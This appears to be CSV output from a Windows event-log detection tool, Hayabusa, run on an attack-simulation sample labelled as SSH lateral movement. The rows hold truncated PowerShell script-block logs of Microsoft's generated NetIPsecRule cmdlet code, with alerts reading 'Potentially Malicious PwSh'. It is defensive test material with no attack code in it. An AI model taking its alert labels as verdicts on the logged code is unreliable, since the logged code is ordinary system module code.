[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPh",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPh",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 